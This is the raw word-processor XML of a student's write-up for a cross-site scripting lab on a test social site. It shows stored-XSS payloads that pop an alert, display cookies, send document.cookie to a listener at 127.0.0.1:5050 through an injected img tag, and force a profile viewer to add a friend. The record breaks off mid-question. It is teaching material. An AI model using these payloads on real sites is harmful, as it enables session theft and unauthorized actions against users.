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857" w14:textId="3317A386" w:rsidR="0033000D" w:rsidRPr="001369CB" w:rsidRDefault="006958BB" w:rsidP="00723699">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006958BB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E06809" w14:textId="70F04256" w:rsidR="00E43DFC" w:rsidRDefault="00855A1F" w:rsidP="008037F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00855A1F">
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Wind</w:t>
      </w:r>
      <w:r w:rsidR="00EB3A61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2AE9E3" wp14:editId="216CECDB">
            <wp:extent cx="2676467" cy="170723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96780" cy="17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893" w14:textId="619A139C" w:rsidR="00462B66" w:rsidRDefault="00462B66" w:rsidP="00462B66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rstly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008675B5">
        <w:t xml:space="preserve">login as </w:t>
      </w:r>
      <w:r w:rsidR="00C1656F">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="008675B5">
        <w:t>lice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348A86C" w14:textId="64AB0AF9" w:rsidR="008675B5" w:rsidRDefault="003E17E3" w:rsidP="00462B66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hen, insert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes in the </w:t>
      </w:r>
      <w:r w:rsidR="009D3348">
        <w:t>profile area</w:t>
      </w:r>
      <w:r w:rsidR="00547F6F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0EDF1" w14:textId="0C20C455" w:rsidR="000C5F1B" w:rsidRPr="00462B66" w:rsidRDefault="000C5F1B" w:rsidP="00462B66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r w:rsidR="00DC3AAA">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DC3AAA">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A45584" w14:textId="569F01FD" w:rsidR="008572B6" w:rsidRDefault="002E3BC6" w:rsidP="00A36443">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D173BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D1C2E2A" wp14:editId="3C2CB904">
            <wp:extent cx="2991620" cy="121415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7612" cy="122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D9F1" w14:textId="74D23BEC" w:rsidR="00D931A2" w:rsidRDefault="00D838CA" w:rsidP="00A36443">
      <w:r>
        <w:t>Save and refresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3DF58" w14:textId="793F9F46" w:rsidR="00606F24" w:rsidRDefault="000B3531" w:rsidP="00A36443">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663AFF0F" wp14:editId="7A7841C3">
            <wp:extent cx="1666586" cy="117339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7123" cy="11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42A9" w14:textId="5F2F5857" w:rsidR="00606F24" w:rsidRDefault="00606F24" w:rsidP="00A36443">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s we can see, once launched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alice’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profile page, the window will appear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365CE184" w14:textId="309C6548" w:rsidR="00606F24" w:rsidRPr="00CB1602" w:rsidRDefault="00606F24" w:rsidP="00A36443">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is because tags and data are mixed in the html5. Once we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tag, the message we typed in is regarded as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code. </w:t>
      </w:r>
      <w:r w:rsidR="004557BD">
        <w:t>After the code executes, the</w:t>
      </w:r>
      <w:r w:rsidR="00552AE2">
        <w:t xml:space="preserve"> alert windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00552AE2">
        <w:t>shows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00552AE2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39729BED" w14:textId="2175E330" w:rsidR="00F82369" w:rsidRPr="00F82369" w:rsidRDefault="007B1EBD" w:rsidP="005B49D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1EBD">
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C308A" w14:textId="51E053F0" w:rsidR="006B3919" w:rsidRDefault="00061C04" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Change the content of the JS code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600FDB9" w14:textId="730A7CBF" w:rsidR="00061C04" w:rsidRDefault="004A65DF" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A65DF">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A65DF">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A65DF">
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BB7E2" w14:textId="3B12141C" w:rsidR="00757C63" w:rsidRDefault="0028464A" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B03B6C8" wp14:editId="7799BD86">
            <wp:extent cx="2847453" cy="21247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299" cy="21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4034" w14:textId="45B357C3" w:rsidR="00E63B3C" w:rsidRDefault="00E63B3C" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we can see, instead of showing </w:t>
      </w:r>
      <w:r w:rsidR="00D453F1">
        <w:t>the message “XSS”, it shows the cookie</w:t>
      </w:r>
      <w:r w:rsidR="00062F4D">
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
      <w:r w:rsidR="00D453F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34ED29" w14:textId="535DD384" w:rsidR="00CA349C" w:rsidRDefault="00147A96" w:rsidP="008037F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00147A96">
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C518406" w14:textId="519E3D09" w:rsidR="00256276" w:rsidRDefault="00D7329F" w:rsidP="005C2137">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="278BA417" wp14:editId="14C88B4F">
            <wp:extent cx="5274310" cy="22904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7582" w14:textId="2AF5E1AC" w:rsidR="00AA2A1D" w:rsidRDefault="00AA2A1D" w:rsidP="005C2137">
      <w:r>
        <w:t>Firstly, we start a listening win</w:t>
      </w:r>
      <w:r w:rsidR="008D7DA1">
        <w:t>dow</w:t>
      </w:r>
      <w:r w:rsidR="00DC02FB">
        <w:t xml:space="preserve"> on the VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF5203" w14:textId="63ACFE4E" w:rsidR="00DC02FB" w:rsidRDefault="00D82D3C" w:rsidP="005C2137">
      <w:r>
        <w:t xml:space="preserve">Then, </w:t>
      </w:r>
      <w:r w:rsidR="004B3F9F">
        <w:t>place the malicious code like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD1A62" w14:textId="78AC2EC2" w:rsidR="00BC0183" w:rsidRDefault="00EE1C63" w:rsidP="00A55894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=http://127.0.0.1:5050?c=" + escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1C63">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) + " &gt;"); &lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="000D78E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="501055B9" wp14:editId="0AAE699C">
            <wp:extent cx="5274310" cy="17868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800" w14:textId="56DDCA37" w:rsidR="00D564CE" w:rsidRDefault="00182F1E" w:rsidP="00A55894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fill</w:t>
      </w:r>
      <w:r w:rsidR="00D564CE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>same area, save and observe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A38164" w14:textId="0DA02742" w:rsidR="00182F1E" w:rsidRDefault="005751CC" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6332E7CF" wp14:editId="33A53B70">
            <wp:extent cx="5274310" cy="31032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BC15" w14:textId="63050CBE" w:rsidR="009F04E6" w:rsidRDefault="009F04E6" w:rsidP="00A55894">
      <w:r>
        <w:t>After refreshing the page, the listening window shows some</w:t>
      </w:r>
      <w:r w:rsidR="00EB6BDE">
        <w:t xml:space="preserve"> messages</w:t>
      </w:r>
      <w:r w:rsidR="00595338">
        <w:t xml:space="preserve"> immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D0E1" w14:textId="3AE64840" w:rsidR="002C1BBD" w:rsidRDefault="002C1BBD" w:rsidP="00A55894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we can see, the Get request is </w:t>
      </w:r>
      <w:r w:rsidR="008500FB">
        <w:t>recorded</w:t>
      </w:r>
      <w:r w:rsidR="00DC41D9">
        <w:t xml:space="preserve">. The main reason we can see the </w:t>
      </w:r>
      <w:r w:rsidR="00305976">
        <w:t>record is that by having the JS code</w:t>
      </w:r>
      <w:r w:rsidR="00D6278D">
        <w:t xml:space="preserve"> in the page, </w:t>
      </w:r>
      <w:r w:rsidR="003E7576">
        <w:t>the &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E7576">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E7576">
        <w:t xml:space="preserve">&gt; tag will automatically </w:t>
      </w:r>
      <w:r w:rsidR="008D0A12">
        <w:t>generate a GET request.</w:t>
      </w:r>
      <w:r w:rsidR="00E02F48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00297BD8">
        <w:t>Document.</w:t>
      </w:r>
      <w:r w:rsidR="00150F50">
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00150F50">
        <w:t xml:space="preserve"> method writes the </w:t>
      </w:r>
      <w:r w:rsidR="00870F5E">
        <w:t xml:space="preserve">GET to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00870F5E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00870F5E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00730DCB">
        <w:t xml:space="preserve">Since we are listening the port, we can see the GET </w:t>
      </w:r>
      <w:r w:rsidR="001F710B">
        <w:t>request information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0979FD" w14:textId="06FE9CF2" w:rsidR="006A31B0" w:rsidRDefault="00A55282" w:rsidP="001B2884">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A55282">
        <w:t>Task 4: Becoming the Victim’s Friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BA5B5" w14:textId="77777777" w:rsidR="005C3BB4" w:rsidRPr="00FD4275" w:rsidRDefault="005C3BB4" w:rsidP="005C3BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I didn’t notice that I should do the experiment using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. I did it with Alice’s account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7B585" w14:textId="77777777" w:rsidR="005C3BB4" w:rsidRPr="005C3BB4" w:rsidRDefault="005C3BB4" w:rsidP="005C3BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F86AB87" w14:textId="6A819264" w:rsidR="00F3677A" w:rsidRDefault="000F2B36" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>From previous labs, we know that an add friend request looks like this</w:t>
      </w:r>
      <w:r w:rsidR="003E1919">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9ECE9" w14:textId="6E80384D" w:rsidR="000F2B36" w:rsidRDefault="00BA37C1" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00623114">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/friends/add?friend=44&amp;__elgg_ts=1540772771&amp;__elgg_token=aeBua8N5vBvWKjMDx2urVw</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73F26440" w14:textId="384B8F86" w:rsidR="00147ED1" w:rsidRDefault="00ED6F32" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fill in the blank using the above link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CDD0BC" w14:textId="5CE06744" w:rsidR="00ED6F32" w:rsidRDefault="005B4931" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E686A1" wp14:editId="52E5024F">
            <wp:extent cx="5274310" cy="16332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D363" w14:textId="5AC03A49" w:rsidR="00B630BA" w:rsidRDefault="00DE2646" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Switch to text mode</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B88F28A" w14:textId="47FCDA88" w:rsidR="00DE2646" w:rsidRDefault="00DE2646" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4259810C" w14:textId="591D3E93" w:rsidR="00655D11" w:rsidRDefault="00655D11" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Save and refresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F66D9C" w14:textId="5085E868" w:rsidR="00AF2FAA" w:rsidRDefault="00163835" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Log in with another account</w:t>
      </w:r>
      <w:r w:rsidR="0094259B">
        <w:t xml:space="preserve"> Charlie</w:t>
      </w:r>
      <w:r w:rsidR="00550DD9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0094259B">
        <w:t xml:space="preserve"> Charlie doesn’t have any friends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44458231" w14:textId="4CE7E7C2" w:rsidR="008F6B0A" w:rsidRDefault="00B46A3E" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ABACC0A" wp14:editId="7E7FD7AA">
            <wp:extent cx="3389244" cy="1131108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7852" cy="11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3B7" w14:textId="14FE1C1B" w:rsidR="00EF7C06" w:rsidRDefault="00EF7C06" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>After viewing Alice’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738902E2" w14:textId="0073F348" w:rsidR="00572D71" w:rsidRDefault="00716C9A" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79BDBFB1" wp14:editId="500B5804">
            <wp:extent cx="5274310" cy="24390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8E6" w14:textId="5015B394" w:rsidR="004259F6" w:rsidRDefault="004259F6" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2F6C2E" wp14:editId="3ECF1E41">
            <wp:extent cx="5274310" cy="21583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370" w14:textId="0D2F52B9" w:rsidR="00C10CFF" w:rsidRDefault="00C10CFF" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can see that after </w:t>
      </w:r>
      <w:r w:rsidR="00EA2BCE">
        <w:t xml:space="preserve">Charlie views Alice’s profile, he added friend to Alice. </w:t>
      </w:r>
      <w:r w:rsidR="00463EFB">
        <w:t xml:space="preserve">And one interesting thing is that </w:t>
      </w:r>
      <w:r w:rsidR="00AE0BFF">
        <w:t>when we finished editing Alice’s profile and save, we find that Alice added herself as well!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B852CA4" w14:textId="296CA53C" w:rsidR="00AE0BFF" w:rsidRDefault="00CA1E48" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The main reason the task succeeds is that </w:t>
      </w:r>
      <w:r w:rsidR="004F4093">
        <w:t xml:space="preserve">we construct </w:t>
      </w:r>
      <w:r w:rsidR="00F7032A">
        <w:t>an add friend request ourselves in the about me area.</w:t>
      </w:r>
      <w:r w:rsidR="00A55913">
        <w:t xml:space="preserve"> Once the profile page is open, the about me area will initialize as well.</w:t>
      </w:r>
      <w:r w:rsidR="00FA0599">
        <w:t xml:space="preserve"> Meanwhile, the JS code will be executed and send the add friend request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD18E1D" w14:textId="3742FF21" w:rsidR="00760788" w:rsidRDefault="007A7ECD" w:rsidP="000F7270">
      <w:pPr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Medi" w:hAnsi="NimbusRomNo9L-Medi" w:cs="NimbusRomNo9L-Medi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the purpose of Lines </w:t>
      </w:r>
      <w:r w:rsidR="006A6A26">
        <w:rPr>
          <w:rFonts w:ascii="Dingbats" w:hAnsi="Dingbats" w:cs="Dingbats"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Dingbats" w:hAnsi="Dingbats" w:cs="Dingbats"/>
          <w:kern w:val="0"/>
